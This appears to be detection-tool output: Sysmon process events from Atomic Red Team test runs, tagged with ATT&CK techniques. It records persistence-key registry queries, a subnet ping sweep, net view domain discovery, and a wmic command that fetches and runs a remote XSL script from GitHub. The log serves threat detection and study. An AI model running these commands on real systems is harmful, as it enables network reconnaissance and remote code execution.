SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3707 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.113 + 747F3D96-D87D-5D31-0000-00102B773100 + 2148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3705 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.019 + 747F3D96-D87D-5D31-0000-001090723100 + 196 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.956 + 747F3D96-D87C-5D31-0000-0010056E3100 + 4220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3701 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.900 + 747F3D96-D87C-5D31-0000-00107C693100 + 1740 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3699 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.842 + 747F3D96-D87C-5D31-0000-0010E1643100 + 5936 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 
747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3697 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.775 + 747F3D96-D87C-5D31-0000-001056603100 + 6832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3773 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.991 + 747F3D96-D8F6-5D31-0000-001091D13300 + 4528 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) 
+ Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3772 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:34.779 + 747F3D96-D8F6-5D31-0000-00100FCB3300 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + 
+ 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3771 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.330 + 747F3D96-D8EA-5D31-0000-00108AB83300 + 4684 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User 
(MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3770 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:22.302 + 747F3D96-D8EA-5D31-0000-001030B63300 + 1988 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe 
+ "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3769 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.839 + 747F3D96-D8DD-5D31-0000-001043953300 + 3012 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net view /domain + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "net view /domain" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3768 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:09.804 + 747F3D96-D8DD-5D31-0000-0010EF923300 + 4856 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "net view /domain" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3767 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.873 + 747F3D96-D8DA-5D31-0000-00100D8A3300 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3766 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.748 + 
747F3D96-D8DA-5D31-0000-001029863300 + 3220 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3765 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:51:06.714 + 747F3D96-D8DA-5D31-0000-0010D3833300 + 5340 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 
5 + 4 + 1 + 0 + 0x8000000000000000 + + + 988 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + technique_id=T1059.003,technique_name=Windows Command Shell + 2020-10-20 11:50:56.472 + 23F38D93-CF20-5F8E-D008-000000000C00 + 9620 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + DESKTOP-NTSSLJD\den + 23F38D93-AE9B-5F8E-A2EC-170000000000 + 0x17eca2 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 23F38D93-CF20-5F8E-CE08-000000000C00 + 6896 + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.162 + 747F3D96-D8D0-5D31-0000-001034673300 + 396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3763 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:56.021 + 747F3D96-D8D0-5D31-0000-0010F3623300 + 7040 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic.exe process /FORMAT:list + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-D8CF-5D31-0000-00109B603300 + 5380 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" + 